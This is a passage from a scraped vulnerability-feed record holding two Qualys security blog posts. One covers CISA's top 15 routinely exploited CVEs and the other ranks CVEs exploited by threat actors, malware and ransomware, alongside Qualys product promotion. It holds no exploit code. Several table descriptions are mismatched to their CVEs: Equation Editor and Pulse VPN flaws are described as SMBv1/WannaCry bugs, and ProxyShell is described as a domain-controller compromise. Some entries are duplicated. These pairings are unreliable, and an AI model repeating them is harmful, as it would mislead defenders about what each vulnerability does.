Plus| RCE \n[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)| ProxyShell| Microsoft Exchange Server| Elevation of privilege \n[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)| ProxyShell| Microsoft Exchange Server| RCE \n[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)| ProxyShell| Microsoft Exchange Server| Security feature bypass \n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>)| | Atlassian Confluence Server and Data Center| Arbitrary code execution \n[CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>)| | VMware vSphere Client| RCE \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)| [ZeroLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2020/09/15/microsoft-netlogon-vulnerability-cve-2020-1472-zerologon-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Netlogon Remote Protocol (MS-NRPC)| Elevation of privilege \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)| | Microsoft Exchange Server| RCE \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)| | Pulse Secure Pulse Connect Secure| Arbitrary file reading \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)| | Fortinet FortiOS and FortiProxy| Path traversal \n \n### Highlights of Top Vulnerabilities Cited in CISA 2021 Report\n\nBased on the analysis of this report by the Qualys Research Team, let\u2019s review a few of the top vulnerabilities on the 2021 list and our recommendations for how Qualys enterprise customers can detect and respond to them.\n\n#### Log4Shell Vulnerability\n\nThe Log4Shell vulnerability **(CVE-2021-44228)** was disclosed in December 2021. It was widely exploited by sending a specially crafted code string, which allowed an attacker to execute arbitrary Java code on the server and take complete control of the system. Thousands of products used Log4Shell and were vulnerable to the Log4Shell exploitation.\n\nVisit the [Qualys Log4Shell website](<https://www.qualys.com/log4shell-cve-2021-44228/>) for full details on our response to this threat.\n\n### ProxyShell: Multiple Vulnerabilities\n\nThe multiple vulnerabilities called ProxyShell **(CVE-2021-34523, CVE-2021-34473, CVE-2021-31207)** affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination (i.e., via &quot;vulnerability chaining&quot;) enables a remote actor to execute arbitrary code and privilege escalation.\n\n### ProxyLogon: Multiple Vulnerabilities\n\nThe multiple vulnerabilities named ProxyLogon **(CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065)** also affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination allows an unauthenticated threat actor to execute arbitrary code on vulnerable Exchange Servers, which enables the attacker to gain persistent access to files, mailboxes, and credentials stored on the servers.\n\n[Read our blog](<https://blog.qualys.com/product-tech/2021/03/10/security-advisory-mitigating-the-risk-of-microsoft-exchange-zero-day-proxylogon-vulnerabilities>) on this threat.\n\n#### Confluence Server and Data Center Vulnerability\n\nAn Object Graph Navigation Library injection vulnerability **(CVE-2021-26084)** exists in Confluence Server that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\n#### Top Vulnerabilities of 2020 Persist\n\nThree additional vulnerabilities **(CVE-2020-1472, CVE-2018-13379, CVE-2019-11510)** were part of the routinely exploited [top vulnerabilities of 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>) list but continued to be exploited well into 2021.\n\n### How Can Qualys Help?\n\nThe Qualys Research Team stays on top of CISA\u2019s vulnerability reports by mapping and releasing our QIDs as needed. The goal is to provide our enterprise customers with complete visibility into risk across their organizations.\n\n#### Detect CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\n[Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) provides coverage for all 15 vulnerabilities described in the CISA report. [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) can automatically patch all Windows-related vulnerabilities which account for 60% of the 15 vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities.\n\nUsing VMDR and Qualys Query Language (QQL) lets you easily detect all your assets that are vulnerable to the top 15.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nView vulnerabilities be severity in Qualys VMDR\n\nQualys Unified Dashboard provides a comprehensive view of the top 15 exploited vulnerabilities as they affect your entire enterprise environment. The dashboard allows the security team to keep track of each vulnerability as they may propagate across multiple assets in your infrastructure.\n\nDashboard CISA: Alert (AA22-117A) | Top 15 Routinely Exploited\n\nQualys Unified Dashboard\n\n#### Prioritize CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys VMDR makes it easy to prioritize the top 15 exploited vulnerabilities affecting your company\u2019s internet-facing assets. To do so, apply the tag \u201cInternet Facing Assets\u201d in the Prioritization tab. You can add tags like &quot;Cloud Environments&quot;, &quot;Type: Servers&quot;, &quot;Web Servers&quot;, and &quot;VMDR-Web Servers&quot; to increase your scope of assets.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nPrioritizing vulnerabilities for remediation in Qualys VMDR\n\n#### Remediate CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys Patch Management offers out-of-the-box support for patching multiple CISA vulnerabilities. Patch Management also provides patches for many Microsoft, Linux, and third-party application vulnerabilities.\n\nTo view the patchable QIDs, enable the &quot;Show only Patchable&quot; toggle button. After that, you can configure the patch job to patch the relevant QIDs and their respective associated CVEs.\n\nUsing Qualys Patch Management to apply patches\n\nQualys Patch Management also provides the ability to deploy custom patches. The flexibility to customize patch deployment allows you to patch all the remaining CVEs in your patching to-do list.\n\nTo get a view of all available patches for CISA\u2019s top 15 exploitable vulnerabilities of 2021, go to the Patch Management application and run this QQL statement in the Patches tab:\n \n \n cve:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nViewing available patches in Qualys Patch Management\n\nFor additional patch details about vulnerabilities reported by CISA, please see the [Appendix](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) of the CISA report.\n\n### Getting Started\n\nReady to get started? Learn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-06T12:19:24", "type": "qualysblog", "title": "CISA Alert: Top 15 Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2020-0688", "CVE-2020-1472", "CVE-2021-21972", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228"], "modified": "2022-05-06T12:19:24", "id": "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-08T15:22:18", "description": "The [previous blog](<https://blog.qualys.com/product-tech/2023/07/11/an-in-depth-look-at-the-latest-vulnerability-threat-landscape-part-1>) from this three-part series showcased an overview of the vulnerability threat landscape. To summarize quickly, it illustrated the popular methods of exploiting vulnerabilities and the tactical techniques employed by threat actors, malware, and ransomware groups. Perhaps more crucially, we stated that commonly used solutions (CISA KEV/EPSS) often fall short in identifying high-risk vulnerabilities. \n\nIn this blog, we will focus on an **insider&#x27;s perspective on the threat landscape**, viewing it through the eyes of an attacker. We will examine how quickly vulnerabilities get exploited in the wild, identify popularly sought-after vulnerabilities by threat actors, malware, and ransomware groups, and explore their underlying motives. \n\nWe will also provide insights on what measures to take you can take to safeguard your organizations from these vulnerabilities. \n\nSo, let&#x27;s dive headfirst into this intriguing world without further ado. \n\n### How Fast Are Vulnerabilities Getting Exploited (Time to CISA KEV)?\n\nWe&#x27;ve already highlighted one of the most noteworthy efforts by the team at CISA - the creation of the known exploited vulnerabilities catalog in our previous blog. Initiated as part of [Binding Operational Directive 22-01 in 2021](<https://www.cisa.gov/news-events/directives/binding-operational-directive-22-01>), this project was born out of the need to minimize risks associated with these vulnerabilities. In its early years, there was a substantial backlog to address. Still, by 2023, the CISA team has had their operation running like a well-oiled machine and is swiftly updating the catalog with newly exploited vulnerabilities as soon as evidence emerges. \n\nSo, let&#x27;s dive deep into understanding how quickly the vulnerabilities get exploited in the wild, as disclosed by the National Vulnerability Database(NVD).\n\nThe following graph illustrates the average duration it takes to include a vulnerability in the Known Exploited Vulnerabilities (KEV) catalog from when it was published in NVD.\n\nFor those CVEs disclosed in 2023, the gap to **time to KEV was just eight days**.\n\nFig 1. Average Time in Days to CISA KEV Catalog\n\nDefenders, therefore, have limited time to respond to vulnerabilities. The only viable response is through automation to patch these vulnerabilities before attackers can exploit them. Note that the average timeframe mentioned here, as in some instances, vulnerabilities are exploited almost instantly.\n\n### Which Vulnerabilities Are Exploited and by Whom?\n\nSo which vulnerabilities are exploited in the wild? And who is exploiting them? Are there any specific vulnerabilities that are more sought-after than others? If so, which ones?\n\nTo understand these questions, let&#x27;s examine three main groups of attackers.\n\n * Threat Actor groups\n * Malwares\n * Ransomware groups\n\nAlthough there is some overlap within each group, it appears to favor a slightly different set of vulnerabilities depending on the use case.\n\n## Top Ten Vulnerabilities Exploited by Threat Actors\n\nHere\u2019s a list of the top ten vulnerabilities exploited by threat actors.\n\nThe chart below shows **the number of threat actors known to exploit a given vulnerability**.\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-2-Top-10-Vulnerabilities-Exploited-by-Threat-Actors.png>)Fig 2. Top Ten Vulnerabilities Exploited by Threat Actors for High-Risk Vulnerabilities\n\n**Title** | **CVE**s | **Threat Actor Count** | **TruRisk Score** **(QVS)** | **Description** \n---|---|---|---|--- \nMicrosoft Office/WordPad Remote Code Execution Vulnerability | CVE-2017-0199 | 53 | 100 | Allows a malicious actor to download Visual Basic script containing PowerShell commands. Works reliably well across a wide attack surface. Popular with [APT Groups](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>). \nMicrosoft Office Equation Editor Remote Code Execution Vulnerability | CVE-2017-11882 | 52 | 100 | Exploits Office&#x27;s default Equation Editor feature by tricking the user to open a malicious file. This one is the hacking group\u2019s most favorite vulnerability, especially groups such as Cobalt or other malware as you will see in the next section. \nWindows Common Controls Remote Code Execution Vulnerability | CVE-2012-0158 | 45 | 100 | Executes remote code by tricking the user to click on a malicious link or specially crafted malicious file. \nApache Log4j RCE (Log4Shell) | CVE-2021-44228 | 26 | 100 | [Log4Shell](<https://www.qualys.com/log4shell-cve-2021-44228/>). Do we need to say anything more? \nMicrosoft Office Memory Corruption Vulnerability | CVE-2018-0802 | 24 | 100 | Executes remote code by tricking the user to open a specially crafted malicious file in Office or WordPad. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon) | CVE-2021-26855 | 22 | 100 | Allows an unauthenticated user to run arbitrary commands on the exchange server in its default configuration. Heavily exploited by the [Hafnium](<https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) group among others. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-34473 | 20 | 100 | Allows an unauthenticated user to run arbitrary commands on the exchange server. Can be clubbed with other CVE\u2019s CVE-2021-34523 and CVE-2021-31207 making it more attractive to cybercriminals. \nArbitrary file write vulnerability in Exchange | CVE-2021-27065 | 19 | 95 | Requires authentication that can then write arbitrary file write vulnerability in Exchange. Leveraged as part of the attack chain once an attacker has initial access. Exploited by Hafnium group among others. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-34523 | 17 | 100 | Allows an unauthenticated user to run arbitrary commands on the exchange server. Can be chained with other CVE\u2019s CVE-2021-34473 and CVE-2021-31207 making it more attractive to cybercriminals. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-31207 | 17 | 95 | Allows an unauthenticated user to run arbitrary commands on the exchange server. Can be chained with other CVE\u2019s CVE-2021-34473 and CVE-2021-31207 making it more attractive to cybercriminals. \n \nTable 1. Top 10 Vulnerabilities Exploited by Threat Actors for High-Risk Vulnerabilities\n\n## Top Ten Highly Active Threat Actors\n\nNext, let\u2019s talk about some of the most active threat actors known to leverage the maximum number of vulnerabilities as part of their arsenal capable of compromising systems across the globe.\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-3-Most-Active-Threat-Actors.png>)Fig 3. Most Active Threat Actors for High-Risk Vulnerabilities\n\n**Threat Actor ** | **CVEs Exploited ** | **Description ** \n---|---|--- \nEquation Group** ** | 51 | Uses a variety of malware, including backdoors, trojans, and rootkits, often targeting zero-day vulnerabilities. Such kinds of malware are often challenging to detect and remove. \nFancy Bear** ** | 44 | Best known as APT28 or Sofacy, it uses advanced malware and spear-phishing tactics. The group is also known for using \u201cwatering hole\u201d attacks. In 2016, APT28 reportedly attempted to interfere with the U.S. presidential elections. \nWicked Panda** ** | 30 | Also known by Axiom, Winnti, APT41, or Bronze Atlas. This group conducts financially motivated operations. It&#x27;s been observed to target healthcare, telecom, technology, and video game industries in 14 countries. \nRicochet Chollima** ** | 26 | Also known as APT37, Reaper, and ScarCruft, they primarily target financial institutions, academics, and journalists. \nLabyrinth Chollima** ** | 24 | This is a sub-group of the Lazarus Group that has been attributed to the Reconnaissance General Bureau. It was reportedly responsible for the November 2014 destructive wiper attack against Sony Pictures Entertainment as part of a known campaign called The Operation Blockbuster campaign by Novetta. \nStardust Chollima** ** | 22 | Also known as BlueNoroff, it is a sub-group of the Lazarus Group and has been attributed to the Reconnaissance General Bureau, target banks, financial institutions, casinos, cryptocurrency exchanges, SWIFT system endpoints, and ATMs in at least 38 countries worldwide. \nCarbon Spider** ** | 22 | Also known as Carbanak, FIN7, and Anunak, this threat actor is a financially motivated threat group that targets the U.S. retail, restaurant, and hospitality sectors, often using point-of-sale malware. \nCozy Bear** ** | 20 | Also known as APT29, often targets government networks in Europe and NATO member countries, research institutes, and think tanks. \nAPT37** ** | 20 | It is also linked to the following campaigns between 2016-2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are You Happy? FreeMilk, North Korean Human Rights, and Evil New Year 2018. \n | | \n \nTable 2. Most Active Threat Actors for High-Risk Vulnerabilities \n\n## Top Ten Most Exploited Vulnerabilities by Malware\n\nNow, let\u2019s check some of the commonly exploited vulnerabilities by malware.\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-4-Top-10-Vulnerabilities-Exploited-by-Malwares.png>)Fig 4. Top Ten Vulnerabilities Exploited by Malware for High-Risk Vulnerabilities\n\nTitle | CVEs | Malware Count | TruRisk Score (QVS) | Description \n---|---|---|---|--- \nMicrosoft Office Equation Editor Remote Code Execution Vulnerability | CVE-2017-11882 | 467 | 100 | The absolute granddaddy of all CVEs most exploited by malware. \nIn the history of CVEs, this would be the most beloved malware CVE of all time. \nMicrosoft Office/WordPad Remote Code Execution Vulnerability | CVE-2017-0199 | 92 | 100 | [Allows a malicious actor to download Visual Basic script containing PowerShell commands. Works reliably well across a wide attack surface. Popular with APT Groups.](<https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html>) \nJava Applet Field Bytecode Verifier Cache RCE | CVE-2012-1723 | 91 | 100 | Exploits the vulnerability in JRE to download and install files of an attacker\u2019s choice onto the system. \nMicrosoft Office Remote Code Execution Vulnerability | CVE-2017-8570 | 52 | 100 | [Executes remote code by tricking the user to open a malicious RTF file. Bypasses the patch from CVE-2017-0199. Known to be used in malware spam campaigns.](<https://www.zscaler.com/blogs/security-research/cve-2017-8570-and-cve-2018-0802-exploits-being-used-spread-lokibot>) \nWindows Graphics Device Interface (GDI) RCE | CVE-2019-0903 | 30 | 93 | Exploits vulnerability in the Graphics Component which is fundamental part of the Windows OS used for rendering graphics. \nMicrosoft Office Memory Corruption Vulnerability | CVE-2018-0802 | 29 | 100 | Exploits a vulnerability that was not patched by CVE-2017-11882. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyLogon) | CVE-2021-26855 | 19 | 100 | [Allows an unauthenticated user to run arbitrary commands on the exchange server in its default configuration. Heavily exploited by Hafnium group among others.](<https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) \nMicrosoft Windows Netlogon Privilege Escalation (ZeroLogon) | CVE-2020-1472 | 17 | 100 | Allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. \nLets the attacker instantly become an admin on enterprise networks. \nMicrosoft Windows CryptoAPI Spoofing Vulnerability | CVE-2020-0601 | 17 | 95 | Enables attackers to execute spoofing attacks, masquerading malicious programs as legitimate software, apparently authenticated with a genuine digital signature. \nThis essentially allows for the delivery of malware under the guise of legitimate software. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-34473 | 12 | 100 | Allows an unauthenticated user to run arbitrary commands on the exchange server. \nIt can be chained with other CVE\u2019s CVE-2021-34523 and CVE-2021-31207 making it more attractive to cybercriminals. \n \nTable 3. Top Ten Vulnerabilities Exploited by Malware for High-Risk Vulnerabilities\n\n## Top Ten Most Active Malware\n\nAnd here\u2019s a list of the ten most common malware names that are known to exploit vulnerabilities that compromise systems.\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-5-Most-Active-Malwares.png>)Fig 5. Most Active Malware for High-Risk Vulnerabilities\n\nMalware | CVEs Count | Description \n---|---|--- \nHeuristic | 117 | Heuristic viruses can refer to malware detected by heuristic analysis or the virus Heur. The Invader, which compromises a device\u2019s security and antivirus measures. Some examples of heuristic viruses include adware and Trojans. \nWacatac | 94 | Also known as Trojan: Win32/Wacatac.B, is a trojan horse that is designed to steal personal information, such as passwords, credit card numbers, and other sensitive data. \nPidief | 73 | Pidief malware is a file infector, that can infect executable files, such as .exe files, it will modify the file to execute the Pidief malware. \nSkeeyah | 52 | Skeeyah malware is a file infector that can infect executable files, such as .exe files. It will modify the file in a way that will execute the Skeeyah malware when the file is opened. \nBitrep | 49 | Trojan horse virus that infiltrates a computer via a vulnerability in Adobe Flash. Swifi is downloaded from a malicious website without user knowledge or consent and may cause performance degradation, and security malfunctions leading to unauthorized users gaining remote access \nMeterpreter | 46 | Meterpreter is a malicious trojan-type program that allows cyber criminals to remotely control infected computers, without writing anything to disk. This malware can log keystrokes - recording keyboard input (keys pressed) to steal credentials (logins, passwords) linked with various accounts and personal information. \nSwifi | 42 | Trojan horse virus that infiltrates a computer via a vulnerability in Adobe Flash. Swifi is downloaded from a malicious website without user knowledge or consent, and may cause performance degradation, and security malfunctions leading to unauthorized users gaining remote access \nIFrame | 38 | The iframes are used to inject malicious content into a website and can be spread through malicious websites that contain iframes with malicious content. \nLotoor | 35 | It can infect Android devices, often spread through malicious apps available on third-party app stores. These apps may appear to be legitimate, but they actually contain the Lotoor malware. \nRedirector | 34 | Redirects users to malicious websites without their knowledge or consent. This type of malware can be very dangerous, leading users to download other malicious software or enter personal information. \n \nTable 4. Most Active Malware for High-Risk Vulnerabilities\n\n## Top Ten Vulnerabilities Exploited by Ransomware\n\nLastly, let&#x27;s examine the vulnerabilities that ransomware tends to exploit. **Ransomware is a particular type of malware that encrypts data on storage systems, rendering them inaccessible unless the victim pays a ransom, typically in Bitcoin.** Since the notorious WannaCry crypto-ransomware incident in May 2017, the use of such malicious software has notably escalated.\n\nThe latest report on such escalating threat involves a data breach during a MOVEit transfer, for which the BlackCat ransomware gang claimed responsibility. This same group alleges to be behind the data theft attack on Reddit.\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-6-Top-10-Vulnerabilities-Exploited-by-Ransomware.png>)Fig 6. Top Ten Vulnerabilities Exploited by Ransomware for High-Risk Vulnerabilities\n\n**Title** | **CVEs** | **Ransomware Count** | **TruRisk** **Score (QVS)** | **Description** \n---|---|---|---|--- \nMicrosoft Office Equation Editor Remote Code Execution Vulnerability | CVE-2017-11882 | 14 | 100 | Allows an unauthenticated attacker to exploit the vulnerability in SMBv1 to completely compromise systems. It was used by the [WannaCry crypto worm](<https://en.wikipedia.org/wiki/WannaCry_ransomware_attack>) as part of a worldwide cyberattack. \nJava AtomicReferenceArray deserialization RCE | CVE-2012-0507 | 42 | 100 | Exploits the vulnerability in JRE to download and install files of an attacker\u2019s choice onto the system by tricking the user to visit a malicious link. Old CVE, but still relevant. \nJava Applet Field Bytecode Verifier Cache RCE | CVE-2012-1723 | 13 | 100 | Exploits the vulnerability in JRE to download and install files of an attacker\u2019s choice onto the system. \nWindows SMB v1 Remote Code Execution (WannaCry) | CVE-2017-0145 | 13 | 100 | Allows an unauthenticated, remote attacker to read arbitrary files allowing the attacker to access private keys or user/password information, which is then used to gain further unauthorized access. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-34473 | 12 | 100 | Allows an unauthenticated user to run arbitrary commands on the exchange server. It Can be chained with other CVE\u2019s CVE-2021-34523 and CVE-2021-31207 making it more attractive to cybercriminals. \nPulse Connect Secure SSL VPN Vulnerability | CVE-2019-11510 | 12 | 100 | Allows an unauthenticated attacker to exploit the vulnerability in SMBv1 that completely compromises systems. It was leveraged by the WannaCry crypto worm as part of a worldwide cyberattack. \nWindows SMB v1 Remote Code Execution (WannaCry) | CVE-2017-0144 | 12 | 95 | Allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It lets the attacker instantly become an admin on enterprise networks. \nMicrosoft Windows Netlogon Privilege Escalation (ZeroLogon) | CVE-2020-1472 | 11 | 93 | Allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It lets the attacker instantly become an admin on enterprise networks. \nMicrosoft Exchange Server Remote Code Execution Vulnerability (ProxyShell) | CVE-2021-34523 | 10 | 100 | Allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. \nIt lets the attacker instantly become an admin on enterprise networks. \nCitrix Application Delivery Controller/NetScaler RCE | CVE-2019-19781 | 10 | 100 | Allows an unauthenticated attacker to execute arbitrary code on the system. Was leveraged to drop NOTROBIN malware to maintain persistent access. \n \nTable 5. Top 10 Vulnerabilities Exploited by Ransomware for High-Risk Vulnerabilities\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-7-Most-Active-Ransomwares.png>)Fig 7. Most Active Ransomware for High-Risk Vulnerabilities\n\n**Ransomware** | **CVEs** **Count** | **Description** \n---|---|--- \n**Conti** | 30 | &quot;Conti&quot; is a Ransomware-as-a-Service (RaaS) targeting corporations and agencies by stealing and threatening to publish their sensitive data unless a ransom is paid. It uses unique encryption keys for each file and victim and leverages the Windows Restart Manager to unlock files for encryption. \n**Cerber** | 30 | This modular ransomware can spread through email attachments, exploit kits, and drive-by downloads. It encrypts files and demands a ransom payment in Bitcoin. \n**REvil** | 25 | This modular ransomware can spread through email attachments, exploit kits, and drive-by downloads. It encrypts files and demands a ransom payment in Bitcoin. \n**Sodinokibi** | 21 | A successor to REvil that is even more sophisticated. It can encrypt files on all types of devices, including servers, laptops, and mobile phones. \n**Lucky** | 21 | This ransomware is known for its aggressive spam campaigns. It sends emails with malicious attachments that, when opened, infect the victim&#x27;s computer with ransomware. \n**GandCrab** | 19 | This ransomware is known for its high ransom demands. It has targeted businesses in various industries, including healthcare, finance, and manufacturing. \n**Ryuk** | 17 | This ransomware is known for its high ransom demands. It has targeted businesses in various industries, including healthcare, finance, and manufacturing. \n**Reveton** | 16 | Known for its scareware tactics, this ransomware displays a fake warning message claiming the victim&#x27;s computer has been infected with malware. The message demands that the victim pay a ransom to remove the malware. \n**STOP** | 15 | Ransomware operators are known to be aggressive and persistent, often threatening to release stolen data or to attack systems again if the ransom is not paid. \n**Satan** | 15 | Satan ransomware can be very high, and there is no guarantee that victims will get their data back even if they pay the ransom. Used in attacks against high-profile organizations, healthcare, education, government, and businesses of all sizes. \n \nTable 6. Most Active Ransomware for High-Risk Vulnerabilities\n\n## Prioritizing Exploited Vulnerabilities with The Qualys VMDR and TruRisk\n\nOftentimes, malicious actors frequently target diverse sets of vulnerabilities to accomplish their objectives. As such, keeping track of who is exploiting what can be daunting, and it&#x27;s certainly not an efficient use of the time for practitioners or security &amp; risk management leaders.\n\nHence, **The Qualys VMDR with TruRisk** facilitates this process, substantially simplifying the prioritization process by translating the risk associated with vulnerabilities, assets, and asset groups into an easily understandable score that both technical and non-technical teams can comprehend this scoring system.\n\nWhen you carefully observe, each vulnerability mentioned above has a TruRisk Score (QVS) of over 90. TruRisk considers these factors daily, consistently assigning a score higher than 90.\n\nSo, from a prioritization standpoint, any issue with a score of 90 or above should be immediately prioritized and remedied.\n\nLet\u2019s take CVE-2017-11882 as an example. The TruRisk score clearly indicates why this is a high-risk vulnerability, with more than 400 malware and 50 threat actors exploiting it, and **we see evidence of exploitation as recently as July 16th, 2023, for a 6-year-old vulnerability. **\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-8-Microsoft-Office-Memory-Corruption-Vulnerability_-CVE-2017-11882.jpg>)\n\nFig 8. Microsoft Office Memory Corruption Vulnerability: CVE-2017-11882\n\n## Assess Your Organizations Exposure to Risk / TruRisk Dashboard\n\nThe Qualys VMDR helps organizations get instant visibility into high-risk vulnerabilities, especially those exploited in the wild.\n\n[](<https://ik.imagekit.io/qualys/wp-content/uploads/2023/07/Fig-9-1.jpg>)\n\nFig 9. Qualys VMDR TruRisk Dashboard for High-Risk Vulnerabilities\n\nThe fastest method to gain insights into your TruRisk is by downloading and importing the TruRisk Dashboard into your VMDR subscription.\n\nThe TruRisk VMDR Dashboard is available \u2013 [Download the Dashboard Here](<https://blog.qualys.com/wp-content/uploads/2023/07/Qualys_VMDR_TruRisk__UDDashboard.zip>)\n\nAnd once you have the visibility patch with Qualys Patch management instantly reduce the risk.\n\n## Key Insights &amp; Takeaways\n\n * The time to Known Exploited Vulnerability (KEV) is down to eight days for CVEs published in 2023. Defenders should leverage automation to patch high-risk vulnerabilities.\n * CVE-2017-11882 stands out as the pinnacle among CVEs in its exploitation by malware, threat actors, and ransomware groups. With over 400 malware, 50 threat actors, and 14 ransomware groups taking advantage of this vulnerability, it will likely be remembered as the most cherished attacker CVE ever.\n * Attackers prominently exploit vulnerabilities in popular applications such as Microsoft Office, Microsoft Exchange, Windows Operating systems, Java, Pulse Secure SSL VPN, and Citrix ADC/NetScaler. Attackers seek these applications** primarily 